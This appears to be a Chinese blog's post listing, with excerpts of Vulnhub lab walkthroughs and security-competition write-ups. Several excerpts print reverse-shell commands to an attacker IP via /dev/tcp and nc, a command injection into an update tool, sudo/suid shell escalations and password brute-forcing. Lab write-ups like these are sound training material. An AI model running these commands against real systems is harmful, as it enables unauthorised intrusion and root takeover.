自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(25)
  • 收藏
  • 关注

原创 Vulnhub靶机随笔-Hacksudo_Aliens

5.通过phpmyadmin登录mysql.进入数据库,我第一步去看了一眼user表,发现root用户和vishal用户加密过的密码一致,于是我退出当前登录,登上了root用户,这一步是考虑到可能存在权限的问题,为后面做铺垫,用不上也无所谓。再回到cpulimit提权的命令,就显然易见了,通过具有suid权限的cpulimit将执行/bin/sh的cpu使用率调至100%,也就是强制让电脑一心一意执行/bin/sh。靶机开放三个端口,22ssh端口,80web端口,9000是数据库图形化界面。

2024-05-10 19:02:45 619

原创 Vulnhub靶机随笔-CYNIX_1

3.我们copy一下URL,打开开发者模式(F12),在网页瞎点点,果真在先生的头部存在一个按钮,只不过被设置了透明,我们将其显现出来:将框框里的参数改为1.0即可。5.好像被过滤掉了,既然他不仁也不能怪我们不义,直接绕过,最简单的当然是上fuzz字典去爆破,我这里是误打误撞,碰到了a就被我绕过了O.o。8.这可不是我画出来的,学过html的同学一眼就能看出这里面暗藏玄机,没学过的同学也没事,看下一张图片。我说我眼神不好,没意见吧,了解lxc,lxd,docker容器的,可能会更明白一点。

2024-05-08 19:49:12 1565

原创 Vulnhub靶机随笔-OS-ByteSec

咱们继续,这里又要用到一种提权姿势PATH提权PATH是Linux和类Unix操作系统中的环境变量,它指定可执行程序的所有bin和sbin存储目录。当用户在终端上运行任何命令时,它会向shell发送请求以在PATH变量中搜索可执行文件来响应用户执行的命令。超级用户通常还可以使用/sbin和/usr/sbin以便于执行系统管理的命令。

2024-03-11 17:15:48 886 1

原创 Vulnhub靶机随笔-Thr0ll

通过nmap我们扫描到靶机开放了21ftp端口,22ssh端口以及80web端口,且ftp允许匿名用户(anonymous)登录,网站存在robots协议,以及几个子目录。这个37292.c的脚本 太符合要求了,so直接拷贝到靶机上,这里我是将当前目录发布出去,靶机wget下载,gcc编译一下,直接获取到root权限,豪取flag。==匿名登陆ftp服务,发现存在一个lol.pcap流量包,我们将其down下来,利用wireshark打开,寻找新的有利信息。靶机 IP:未知 系统:未知。

2024-04-22 18:51:30 371

原创 Vulnhub靶机随笔-BOREDHACKERBLOG: CLOUD AV

我的命令: ./update_cloudav "3 |nc 192.168.3.44 7777 |/bin/bash |nc 192.168.3.44 9999”我用的命令: cat | echo 'bash -i >& /dev/tcp/192.168.3.44/4444 0>&1'|bash。命令: cat | echo 'bash -i >& /dev/tcp/攻击机IP/攻击机开放port 0>&1'|bash。2.别放弃,继续挨个翻目录文件,在/home/scanner下有几个特殊文件。

2024-04-08 16:11:08 1498 2

原创 Vulnhub靶机随笔-Jangow 1.0.1

C.提权 内核提权 第三步 通过SCP将45010.c文件从Linux中传输到物理机中在Windows的cmd中输入下方命令 这里需要将ssh的配置文件更改为允许root登录命令: scp root@攻击机IP:文件所在位置 ./ 第五步 通过gcc编译45010.c文件命令: gcc 45010.c -o exp 这里不用加-c参数

2024-03-21 16:42:37 677

原创 Vulnhub靶机随笔-Chronos

我们可以利用node,node就是类似于java语言的开发环境,我们平常写的是python反弹shell,今天写一个java的反弹shell命令: sudo node -e 'child_process.spawn("/bin/bash", {stdio: [0,1,2]})'

2024-03-07 15:44:08 869 2

原创 Vulnhub靶机随笔-DC-6

可以发现,当前用户graham可以以jens的身份去运行backups.sh脚本,那么很简单了,我们可以把”/bin/bash”写入到backups.sh中,在运行就可以获取shell。到这,肯定有很多小伙伴发现DC系列都是老套路,或许有的直接上手wpscan去找用户名以及密码,然后登陆一个wp-admin的网址,没问题,都是对的。紧接着,咱们把这五个用户名写入user.txt,再使用wpscan去获取密码,好像右绕回来了,还是离不开wpscan,确实是个好工具。速度也很快,大约半分钟,获取5个用户名。

2023-11-21 12:23:46 88

原创 Vulnhub靶机随笔-JIS-CTF

渗透机:Kali IP:192.168.3.19 靶机:JIS-CTF IP:未知。

2023-10-30 19:20:55 137 1

原创 Vulnhub靶场随笔-Funbox1

得到两个用户,admin和joe,继续暴力获取密码,这里有两张方法第一种使用wpscan,命令: wpscan --url http://funbox.fritz.box -U joe --passwords rockyou.txt

2023-10-26 00:38:06 99

原创 Vulnhub靶场随笔HA:Narak

咱们提权还有一个方法,老生常谈了属于是内核漏洞提权CVE-2021-3493 /etc/update-motd.d/00-header

2023-10-23 21:05:25 90

原创 Vlunhub靶场随笔-The Plants Mercury

john。

2023-10-18 21:52:46 67 1

原创 Vulnhub靶场随笔-Driftingblues4

确定靶机存活性 这里使用的是netdiscover 扫描靶机开放端口版本服务信息存在21ftp端口,尝试匿名登陆 Failed,服务器做了加固 另辟蹊径,访问网站 网站这里有个密文,疑似base64加密的 解密 这里用的是burp自带的模块 这不套娃嘛,继续解 Continue 复制到url里头访问下 妥妥的BrainFuck编码(在线解密网址: CTF在线工具-在线Brainfuck加密|在线Brain

2023-10-16 23:05:42 56 1

原创 VulnHub靶场随笔-DC-4

VulnHub靶场随笔-DC-4

2023-10-10 21:43:59 45 1

原创 网络安全经典赛题-MISC隐写,信息隐藏

很遗憾是一个坏掉的png文件,这时候我就怀疑可能是文件头部有问题,于是我又去010中去查看.5.打开这个0-1文件,我发现里面是把flag5分开的两张图片,有点怀疑文件的宽高有问题。2.在挨个查看,翻阅后,我又发现了一个zip文件,于是拿到了第一个,不过是flag2。把flag5图片拖到010中查看,我尝试修改了好多次宽高,都不行,于是我搞了个脚本.(这里的picc,zip就是pic,png 防止冲突,改的名字)Ok,就是一个zip文件,我们保存然后更改格式,解压出来。获取zip文件中的5个?

2023-06-27 21:00:33 182 1

原创 网络安全经典赛题-Web安全之综合渗透测试

11.使用渗透机场景windows7访问http://靶机IP/11,对该页面进行渗透测试,通过提示得到Flag并提交;12.使用渗透机场景windows7访问http://靶机IP/12,对该页面进行渗透测试,通过提示得到Flag并提交;10.使用渗透机场景windows7访问http://靶机IP/10,对该页面进行渗透测试,通过提示得到Flag并提交;13.使用渗透机场景windows7访问http://靶机IP/13,对该页面进行渗透测试,通过提示得到Flag并提交;

2023-04-12 08:44:33 1370

原创 网络安全经典赛题-Linux操作系统渗透测试2

3.通过渗透机Kali Linux对靶机Linux进行渗透测试,将该场景/var/www目录中唯一一个后缀为.bmp的图片文件中的英文单词作为Flag值提交;7.通过渗透机Kali Linux对靶机Linux进行渗透测试,将该场景/var/vsftpd目录中唯一一个后缀为.docx文件的文件内容作为Flag值提交;5.通过渗透机Kali Linux对靶机Linux进行渗透测试,将该场景/home/guest目录中唯一一个后缀为.pdf文件的文件内容作为Flag值提交;

2023-04-10 11:28:39 628 1

原创 网络安全经典赛题-Wireshark数据包分析

1.某公司网络系统存在异常,猜测可能有黑客对公司的服务器实施了一系列的扫描和攻击,使用Wireshark抓包分析软件查看并分析Kali Linux的/root目录下dump.pcapng数据包文件,找到黑客的IP地址,并将黑客的IP地址作为Flag值(如:172.16.1.1)提交;8.继续分析数据包文件dump.pcapng,黑客可能找到异常用户后再次对目标服务器的某个服务进行了密码暴力枚举渗透,成功破解出服务的密码后登录到服务器中下载了一张图片,将图片文件中的英文单词作为Flag值提交。

2023-04-09 14:30:17 273 1

原创 网络安全经典赛题-Windows操作系统渗透测试

(例如114.114.114.114)5.通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行渗透测试,将该场景桌面上111文件夹中唯一一个后缀为.docx文件的文档内容作为FLAG提交;6.通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行渗透测试,将该场景桌面上222文件夹中唯一一个图片中的英文单词作为FLAG提交;7.通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行渗透测试,将该场景中的当前最高账户管理员的密码作为FLAG提交;

2023-04-09 11:42:43 488 1

原创 网络安全经典赛题-Linux操作系统渗透测试

3.通过本地PC中渗透测试平台Kali对服务器场景Linux进行渗透测试,将该场景/var/www/html目录中唯一一个后缀为.html文件的文件内容作为FLAG提交;5.通过本地PC中渗透测试平台Kali对服务器场景Linux进行渗透测试,将该场景/root目录中唯一一个后缀为.bmp的图片文件中的英文单词作为FLAG提交。4.通过本地PC中渗透测试平台Kali对服务器场景Linux进行渗透测试,将该场景/root目录中唯一一个后缀为.bmp文件的文件名称作为FLAG提交;密码:123456)

2023-04-09 11:15:11 575

原创 2019网络安全国赛-数据库渗透测试

1.在渗透机Kali2.0中使用zenmap工具扫描服务器场景server2003所在网段(例如:172.16.101.0/24)范围内存活的主机IP地址和指定开放的1433、3306、80端口。并将该操作使用的命令中必须要使用的字符串作为FLAG提交;进行系统服务及版本扫描渗透测试,并将该操作显示结果中数据库服务对应的服务端口信息作为。模块获取系统权限并查看目标系统的异常(黑客)用户,并将该用户作为。在上一题的基础上使用命令调用该模块,并查看需要配置的信息(使用。命令,并将扫描弱口令模块的名称作为。

2023-03-31 14:06:59 240

原创 VulnHub靶场随笔-Me and my girlfriend

page=profile&user_id=12可进行修改得到其他表单,最终尝试alice所在页面id为5,f12查看到alice的密码。##每次都需要对抓取的数据包增添”x-forwarded-for:127.0.0.1”,并点击forward。12.查看家目录下文件以及隐藏文件,发现flag1,并且得到提示让我们提权获取第二个flag。5.浏览器访问10.20.91.38,看到提示用本地登录,f12查看到提示信息。11.尝试进行撞库 通过ssh发现能远程登录alice,1.查一下本地IP地址。

2023-03-31 10:54:50 60

原创 VulnHub靶场随笔-DC -1

1.查看攻击机(kali)ip地址 #ip a2.查看网段主机存活数 #nmap -sn 192.168.57.0/243.查看靶机开放端口以及服务版本信息 #nmap -p- -sV 192.168.57.1544.登录网站,猜测存在drupal漏洞5.启动msfconsole,寻找漏洞 #msfconsole #search drupal6.使用选项1模块(测试得出),列出参数选项信息

2023-03-31 10:54:28 68

原创 VulnHub靶场随笔-LAMPIAO

9.登录并查找数据库,发现账户名密码,猜测靶机上有一个账户也是tiago,密码也为Virgulino。10.查看/etc/passwd,验证了猜想,成功通过ssh连接靶机。6.启动metaspolit模块,寻找drupal漏洞。2.网站结构是drupal 7版本,1.1898端口是httpd服务。4.综合扫描靶机全端口以及服务版本信息。5.访问网页,发现并无sql注入点。3.扫描端口,判断靶机是哪一台。8.进入shell,搜索信息。挨个查看后,发现数据库信息。7.利用漏洞,进行攻击。

2023-03-31 10:51:37 60

原创 利用Python转换密文

2. 使用渗透机场景windows7浏览服务器场景Python.html页面,根据提示查看或者下载slice.py文件并填写该文件当中的Flag与Flag1字符串,并将该Flag1字符串作为Flag提交(结合第三题分析Flag1);3. 使用渗透机场景windows7编写或者从服务器场景Python.html下载, 运行conversion.py来转换密文,并将运行结果做为Flag提交;发现访问不到,回头看一下扫描的端口,发现存在445端口漏洞,且3389端口开启。Kali下载下来,运行,拿到flag。

2023-03-31 10:09:17 553 4

网络安全脚本-ftp.py

网络安全脚本-ftp.py

2023-04-13

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除